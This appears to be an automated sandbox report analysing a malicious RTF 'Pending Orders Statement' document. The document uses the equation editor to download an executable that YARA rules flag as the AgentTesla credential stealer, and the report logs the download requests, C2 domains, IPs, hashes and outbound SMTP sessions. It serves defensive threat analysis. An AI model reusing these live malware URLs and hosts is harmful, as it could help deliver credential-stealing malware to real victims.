                                                                            Malicious:false
                                                                            Preview: ..
                                                                            C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):246784
                                                                            Entropy (8bit):5.925208163230513
                                                                            Encrypted:false
                                                                            SSDEEP:3072:K/uLx1t8/TCCQKvI3zEl0JHPXzy/4ELgBmDiUvQk85lNphtv:KWt18Q2I3zMCfzt/9
                                                                            MD5:D0154FB70ABD786136AE9F68F285541C
                                                                            SHA1:42988286A1993959373A692AC455375B6AD2AE76
                                                                            SHA-256:E83D03CCD3C91744C4BC4D43A1EA9D55FC7211237F7197C33838507B92D50024
                                                                            SHA-512:8A6660F2A0A1C0A6186FEDD78CE8D5F2BA3FE504E5E0E0113116FAFE99E7604E14EE53D58A0E3B0BB780C59AB5392B6212B5B3610986DBD587BB9EBE52B1B313
                                                                            Malicious:true
                                                                            C:\Users\user\Desktop\~$nding Orders Statement -40064778.doc
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):2.431160061181642
                                                                            Encrypted:false
                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                            Malicious:false

                                                                            Static File Info

                                                                            General

                                                                            File type:Rich Text Format data, version 1, unknown character set
                                                                            Entropy (8bit):4.005010844024142
                                                                            TrID:
                                                                            • Rich Text Format (5005/1) 55.56%
                                                                            • Rich Text Format (4004/1) 44.44%
                                                                            File name:Pending Orders Statement -40064778.doc
                                                                            File size:354788
                                                                            MD5:47c45cbbc8fa7c9c62efdfcadee09e99
                                                                            SHA1:e44f1f16be00551108ece175186d84ce6432a177
                                                                            SHA256:1bb9591f1ed79d19e77dd9e9b0c05ee37aa36c317e93e1d275df2a801c05afe6
                                                                            SHA512:f85529aa06ed4c492e2ab067df3519bcec86288f9f32112802785169b219bba6c36dc371516f045acbd1c9e2ea0b2099992a67d2978cb962ed14a85a9821734e
                                                                            SSDEEP:6144:iaVgbuklQVZRG1DPV9Uq+qUF9pa3C4T/JnsKxW7Cn11Y6xbZ3Icf12CLPvqSuoo:zSbT6ZyrVyq+X7l49nC7+Brc6XEH
                                                                            File Content Preview:{\rtf1854{\object14683912 14683912\objhtml\objw9136\objh7915{\*\objdata675050 {\mchr4061916.4061916\.4061916 \mchr4061916.4061916\.4061916} \..................... .fbe51715020000000b000

                                                                            File Icon

                                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                                            Static RTF Info

                                                                            Objects

                                                                            Id | Start     | Format ID | Format   | Classname  | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                                            0  | 00000053h | 2         | embedded | eqUATION.3 | 177225   |          |            |          | no

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets


                                                                            UDP Packets


                                                                            DNS Queries

                                                                            Timestamp                          | Source IP    | Dest IP | Trans ID | OP Code            | Name                  | Type           | Class
                                                                            Jan 27, 2021 19:29:35.743539095 CET | 192.168.2.22 | 8.8.8.8 | 0x315e   | Standard query (0) | cy.kl-re.com          | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.302427053 CET | 192.168.2.22 | 8.8.8.8 | 0xc52c   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.359721899 CET | 192.168.2.22 | 8.8.8.8 | 0xc52c   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.889395952 CET | 192.168.2.22 | 8.8.8.8 | 0x4d68   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.946649075 CET | 192.168.2.22 | 8.8.8.8 | 0x4d68   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.899270058 CET | 192.168.2.22 | 8.8.8.8 | 0xd43a   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.947629929 CET | 192.168.2.22 | 8.8.8.8 | 0xd43a   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:42.171370029 CET | 192.168.2.22 | 8.8.8.8 | 0xdaae   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:52.314512014 CET | 192.168.2.22 | 8.8.8.8 | 0x535a   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.741722107 CET | 192.168.2.22 | 8.8.8.8 | 0x2228   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.801891088 CET | 192.168.2.22 | 8.8.8.8 | 0x2228   | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)

                                                                            DNS Answers

                                                                            Timestamp                          | Source IP | Dest IP      | Trans ID | Reply Code   | Name                  | CName                | Address        | Type                   | Class
                                                                            Jan 27, 2021 19:29:35.968858957 CET | 8.8.8.8   | 192.168.2.22 | 0x315e   | No error (0) | cy.kl-re.com          | cybersng.duckdns.org |                | CNAME (Canonical name) | IN (0x0001)
                                                                            Jan 27, 2021 19:29:35.968858957 CET | 8.8.8.8   | 192.168.2.22 | 0x315e   | No error (0) | cybersng.duckdns.org  |                      | 172.111.202.41 | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.358746052 CET | 8.8.8.8   | 192.168.2.22 | 0xc52c   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.416305065 CET | 8.8.8.8   | 192.168.2.22 | 0xc52c   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.945761919 CET | 8.8.8.8   | 192.168.2.22 | 0x4d68   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:25.009015083 CET | 8.8.8.8   | 192.168.2.22 | 0x4d68   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.947115898 CET | 8.8.8.8   | 192.168.2.22 | 0xd43a   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.995476007 CET | 8.8.8.8   | 192.168.2.22 | 0xd43a   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:42.229362965 CET | 8.8.8.8   | 192.168.2.22 | 0xdaae   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:52.362375975 CET | 8.8.8.8   | 192.168.2.22 | 0x535a   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.801039934 CET | 8.8.8.8   | 192.168.2.22 | 0x2228   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.852639914 CET | 8.8.8.8   | 192.168.2.22 | 0x2228   | No error (0) | mail.privateemail.com |                      | 198.54.122.60  | A (IP address)         | IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • cy.kl-re.com
                                                                            • 193.239.147.103

                                                                            HTTP Packets

                                                                            Session ID | Source IP    | Source Port | Destination IP | Destination Port | Process
                                                                            0          | 192.168.2.22 | 49167       | 172.111.202.41 | 80               | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            Timestamp                          | kBytes transferred | Direction | Data
                                                                            Jan 27, 2021 19:29:36.072925091 CET | 0                  | OUT       | GET //power/bo/boobov.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: cy.kl-re.com
                                                                            Connection: Keep-Alive
                                                                            Jan 27, 2021 19:29:36.354144096 CET | 2                  | IN        | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 27 Jan 2021 18:29:36 GMT
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 246784
                                                                            Connection: keep-alive
                                                                            Last-Modified: Tue, 26 Jan 2021 23:18:29 GMT
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Nginx-Upstream-Cache-Status: EXPIRED
                                                                            X-Server-Powered-By: Engintron
                                                                            Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 193.239.147.103 | 80 | C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 19:29:37.731040955 CET | 262 | OUT | GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1
    Host: 193.239.147.103
    Connection: Keep-Alive
Jan 27, 2021 19:29:37.780169010 CET | 263 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 27 Jan 2021 18:29:37 GMT
    Content-Type: text/html
    Content-Length: 912812
    Last-Modified: Tue, 26 Jan 2021 23:17:49 GMT
    Connection: keep-alive
    Vary: Accept-Encoding
    ETag: "6010a31d-dedac"
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes


                                                                            SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 27, 2021 19:30:18.838618040 CET | 587 | 49169 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:18.839448929 CET | 49169 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 724536
Jan 27, 2021 19:30:19.032927036 CET | 587 | 49169 | 198.54.122.60 | 192.168.2.22 | 250-MTA-09.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Jan 27, 2021 19:30:19.033739090 CET | 49169 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jan 27, 2021 19:30:19.228844881 CET | 587 | 49169 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jan 27, 2021 19:30:25.400098085 CET | 587 | 49170 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:25.400990009 CET | 49170 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 724536
Jan 27, 2021 19:30:25.594579935 CET | 587 | 49170 | 198.54.122.60 | 192.168.2.22 | 250-MTA-09.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Jan 27, 2021 19:30:25.595061064 CET | 49170 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jan 27, 2021 19:30:25.788259029 CET | 587 | 49170 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jan 27, 2021 19:30:33.386825085 CET | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:33.387015104 CET | 49172 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 724536
Jan 27, 2021 19:30:33.582669973 CET | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 250-MTA-09.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Jan 27, 2021 19:30:33.583038092 CET | 49172 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jan 27, 2021 19:30:33.778525114 CET | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jan 27, 2021 19:30:42.642733097 CET | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:42.643021107 CET | 49173 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 724536
Jan 27, 2021 19:30:42.847354889 CET | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 250-MTA-09.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Jan 27, 2021 19:30:42.847765923 CET | 49173 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jan 27, 2021 19:30:43.051781893 CET | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jan 27, 2021 19:30:52.774681091 CET | 587 | 49174 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:52.775216103 CET | 49174 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 724536
Jan 27, 2021 19:30:52.979588985 CET | 587 | 49174 | 198.54.122.60 | 192.168.2.22 | 250-MTA-09.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Jan 27, 2021 19:30:52.980285883 CET | 49174 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jan 27, 2021 19:30:53.184436083 CET | 587 | 49174 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Jan 27, 2021 19:30:59.243333101 CET | 587 | 49175 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:59.243845940 CET | 49175 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 724536
Jan 27, 2021 19:30:59.437447071 CET | 587 | 49175 | 198.54.122.60 | 192.168.2.22 | 250-MTA-09.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Jan 27, 2021 19:30:59.438045025 CET | 49175 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Jan 27, 2021 19:30:59.631119013 CET | 587 | 49175 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS

                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior


                                                                            System Behavior

General

Start time: 19:29:37
Start date: 27/01/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13f540000
File size: 1424032 bytes
MD5 hash: 95C38D04597050285A18F66039EDB456
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:29:38
Start date: 27/01/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:29:39
Start date: 27/01/2021
Path: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Imagebase: 0x11e0000
File size: 246784 bytes
MD5 hash: D0154FB70ABD786136AE9F68F285541C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 19:29:47
Start date: 27/01/2021
Path: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Imagebase: 0x11e0000
File size: 246784 bytes
MD5 hash: D0154FB70ABD786136AE9F68F285541C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 19:29:47
Start date: 27/01/2021
Path: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Imagebase: 0x11e0000
File size: 246784 bytes
MD5 hash: D0154FB70ABD786136AE9F68F285541C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

                                                                            Disassembly

                                                                            Code Analysis
